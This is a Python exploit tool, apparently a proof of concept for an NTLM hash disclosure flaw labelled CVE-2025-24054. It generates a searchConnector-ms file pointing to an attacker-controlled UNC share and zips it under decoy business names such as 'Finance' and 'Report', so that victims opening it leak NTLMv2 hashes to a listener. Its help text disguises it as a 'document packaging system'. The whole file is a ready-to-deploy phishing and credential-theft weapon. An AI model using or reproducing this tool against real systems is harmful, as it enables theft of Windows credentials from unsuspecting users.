import os, json, zipfile, random, argparse, tempfile, hashlib from typing import List, Optional, Dict, Any from abc import ABC, abstractmethod from dataclasses import dataclass from enum import Enum from pathlib import Path from xml.dom import minidom from datetime import datetime import xml.etree.ElementTree as ET from colorama import Fore, Style, init init(autoreset=True) class PayloadType(Enum): SEARCH_CONNECTOR = "searchConnector-ms" LIBRARY_FILE = "library-ms" class SecurityContext: def __init__(self): self._whitelisted_servers = set() self._obfuscation_level = 3 def validate_target(self, target: str) -> bool: if not target or '://' in target: return False return len(target.split('.')) >= 2 @dataclass(frozen=True) class PayloadDescriptor: target_server: str share_name: str payload_type: PayloadType metadata: Dict[str, Any] class IFilePayloadFactory(ABC): @abstractmethod def create_payload(self, descriptor: PayloadDescriptor) -> str: pass @abstractmethod def get_file_extension(self) -> str: pass class XMLPayloadFactory(IFilePayloadFactory): def __init__(self, security_context: SecurityContext): self._security_context = security_context self._template_registry = self._initialize_templates() def _initialize_templates(self) -> Dict[PayloadType, Dict[str, Any]]: return { PayloadType.SEARCH_CONNECTOR: { 'root_element': 'searchConnectorDescription', 'namespace': 'http://schemas.microsoft.com/windows/2009/library', 'template_id': '{7D49D726-3C21-4F05-99AA-FDC2C9474656}' } } def _build_xml_structure(self, descriptor: PayloadDescriptor) -> ET.Element: template_config = self._template_registry[descriptor.payload_type] root = ET.Element(template_config['root_element']) root.set('xmlns', template_config['namespace']) elements = [ self._create_icon_element(), self._create_description_element(), self._create_boolean_elements(), self._create_template_info(template_config), self._create_location_element(descriptor) ] for element in elements: root.append(element) return root def _create_icon_element(self) -> ET.Element: icon = ET.Element('iconReference') icon.text = 'imageres.dll,-1002' return icon def _create_description_element(self) -> ET.Element: desc = ET.Element('description') desc.text = '@shell32.dll,-34575' return desc def _create_boolean_elements(self) -> ET.Element: container = ET.Element('settings') is_search = ET.SubElement(container, 'isSearchOnlyItem') is_search.text = 'false' include_menu = ET.SubElement(container, 'includeInStartMenu') include_menu.text = 'false' return container def _create_template_info(self, template_config: Dict[str, Any]) -> ET.Element: template_info = ET.Element('templateInfo') folder_type = ET.SubElement(template_info, 'folderType') folder_type.text = template_config['template_id'] return template_info def _create_location_element(self, descriptor: PayloadDescriptor) -> ET.Element: simple_location = ET.Element('simpleLocation') url = ET.SubElement(simple_location, 'url') unc_path = f"\\\\{descriptor.target_server}\\{descriptor.share_name}" url.text = unc_path return simple_location def create_payload(self, descriptor: PayloadDescriptor) -> str: xml_root = self._build_xml_structure(descriptor) rough_string = ET.tostring(xml_root, 'utf-8') reparsed = minidom.parseString(rough_string) return reparsed.toprettyxml(indent=" ") def get_file_extension(self) -> str: return ".xml" class ArchiveComposer: def __init__(self, compression_level: int = 6): self._compression_level = compression_level self._file_registry = {} def compose_archive(self, payload_path: str, output_path: str, metadata: Dict[str, Any]) -> str: with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED, compresslevel=self._compression_level) as archive: payload_name = self._generate_payload_filename(metadata) archive.write(payload_path, payload_name) self._file_registry[output_path] = { 'payload': payload_name, 'metadata': metadata } return output_path def _generate_payload_filename(self, metadata: Dict[str, Any]) -> str: doc_type = random.choice([ "Finance", "Employeer" ]) suffix = hashlib.md5(json.dumps(metadata, sort_keys=True).encode()).hexdigest()[:8] return f"{doc_type}_{suffix}.searchConnector-ms" class DocumentGenerator: def __init__(self, security_context: SecurityContext): self._security_context = security_context self._payload_factories = self._initialize_factories() self._archive_composer = ArchiveComposer() def _initialize_factories(self) -> Dict[PayloadType, IFilePayloadFactory]: return { PayloadType.SEARCH_CONNECTOR: XMLPayloadFactory(self._security_context) } def generate_operation_package(self, target_server: str, output_path: Optional[str] = None) -> str: if not self._security_context.validate_target(target_server): raise ValueError(f"Invalid target server: {target_server}") descriptor = PayloadDescriptor( target_server=target_server, share_name=f"sharedir_1337", # or your path (optional) payload_type=PayloadType.SEARCH_CONNECTOR, metadata={ 'timestamp': self._get_current_timestamp(), 'operation_id': self._generate_operation_id() } ) payload_content = self._generate_payload_content(descriptor) with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.xml', encoding='utf-8') as temp_file: temp_file.write(payload_content) temp_path = temp_file.name try: final_output = output_path or self._generate_output_filename() result_path = self._archive_composer.compose_archive( temp_path, final_output, descriptor.metadata ) self._log_operation_result(descriptor, result_path) return result_path finally: if os.path.exists(temp_path): os.unlink(temp_path) def _generate_payload_content(self, descriptor: PayloadDescriptor) -> str: factory = self._payload_factories[descriptor.payload_type] return factory.create_payload(descriptor) def _generate_output_filename(self) -> str: prefixes = ["Project", "Report", "Analysis", "Document", "Review"] return f"{random.choice(prefixes)}_{self._get_current_timestamp()}.zip" def _get_current_timestamp(self) -> str: return datetime.now().strftime("%Y%m%d_%H%M%S") def _generate_operation_id(self) -> str: return hashlib.sha256(os.urandom(32)).hexdigest()[:16] def _log_operation_result(self, descriptor: PayloadDescriptor, output_path: str): print(f"{Fore.GREEN}[+] Listener:{Style.RESET_ALL} {descriptor.target_server}") print(f"{Fore.GREEN}[*] Resource path:{Style.RESET_ALL} \\\\\\\\{descriptor.target_server}\\\\{descriptor.share_name}") print(f"{Fore.CYAN}[*] COMPLETE{Style.RESET_ALL} Package: {Fore.CYAN}{output_path}{Style.RESET_ALL}") print(f"{Fore.CYAN}[*] METADATA{Style.RESET_ALL} OperationID: {Fore.CYAN}{descriptor.metadata['operation_id']}{Style.RESET_ALL}") class ApplicationController: def __init__(self): self._security_context = SecurityContext() self._document_generator = DocumentGenerator(self._security_context) def print_banner(): banner = f"""\n\n \t\t███████{Fore.RED}╗{Style.RESET_ALL}███████{Fore.RED}╗{Style.RESET_ALL} ██████{Fore.RED}╗{Style.RESET_ALL}██████{Fore.RED}╗ {Style.RESET_ALL}███████{Fore.RED}╗{Style.RESET_ALL}████████{Fore.RED}╗{Style.RESET_ALL} \t\t██{Fore.RED}╔════╝{Style.RESET_ALL}██{Fore.RED}╔════╝{Style.RESET_ALL}██{Fore.RED}╔════╝{Style.RESET_ALL}██{Fore.RED}╔══{Style.RESET_ALL}██{Fore.RED}╗{Style.RESET_ALL}██{Fore.RED}╔════╝{Style.RESET_ALL}{Fore.RED}╚══{Style.RESET_ALL}██{Fore.RED}╔══╝{Style.RESET_ALL} \t\t███████{Fore.RED}╗{Style.RESET_ALL}█████{Fore.RED}╗{Style.RESET_ALL} ██{Fore.RED}║ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL}██{Fore.RED}║{Style.RESET_ALL}█████{Fore.RED}╗ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL} \t\t{Fore.RED}╚════{Style.RESET_ALL}██{Fore.RED}║{Style.RESET_ALL}██{Fore.RED}╔══╝ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL}██{Fore.RED}║{Style.RESET_ALL}██{Fore.RED}╔══╝ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL} \t\t███████{Fore.RED}║{Style.RESET_ALL}███████{Fore.RED}╗{Style.RESET_ALL}{Fore.RED}╚{Style.RESET_ALL}██████{Fore.RED}╗{Style.RESET_ALL}██████{Fore.RED}╔╝{Style.RESET_ALL}███████{Fore.RED}╗ {Style.RESET_ALL}██{Fore.RED}║ {Style.RESET_ALL} \t\t{Fore.RED}╚══════╝╚══════╝ ╚═════╝╚═════╝ ╚══════╝ ╚═╝ {Style.RESET_ALL} {Style.RESET_ALL}.______________________________________________________{Fore.RED}|_._._._._._._._._._.{Style.RESET_ALL} {Style.RESET_ALL} \\_____________________________________________________{Fore.RED}|_#_#_#_#_#_#_#_#_#_|{Style.RESET_ALL} {Fore.RED}l {Style.RESET_ALL} \t\t{Fore.MAGENTA}NTLM Hash Disclosure (NTLMv2-SSP) - {Fore.RED}CVE-2025-24054 {Style.RESET_ALL}\n """ print(banner) def execute_operation(self, target: str, output: Optional[str] = None) -> int: try: result_path = self._document_generator.generate_operation_package( target, output ) self._display_operation_summary(result_path, target) return 0 except Exception as e: print(f"[ERROR] Operation failed: {str(e)}") return 1 def _display_operation_summary(self, result_path: str, target: str): print("-=-"*20) print(f"{Fore.CYAN}[*] Output:{Style.RESET_ALL} {Path(result_path).absolute()}") print(f"{Fore.CYAN}[*] File Size:{Style.RESET_ALL} {os.path.getsize(result_path)} bytes") print(f"{Fore.CYAN}[*] Status:{Style.RESET_ALL} {Fore.GREEN}READY_FOR_DEPLOYMENT{Style.RESET_ALL}\n") def main(): ApplicationController.print_banner() parser = argparse.ArgumentParser(description="Advanced Document Packaging System", formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("target", help="Target endpoint for resource coordination") parser.add_argument( "-o", "--output", help="Output package filename", default=None ) args = parser.parse_args() app_controller = ApplicationController() return app_controller.execute_operation(args.target, args.output) if __name__ == "__main__": exit(main())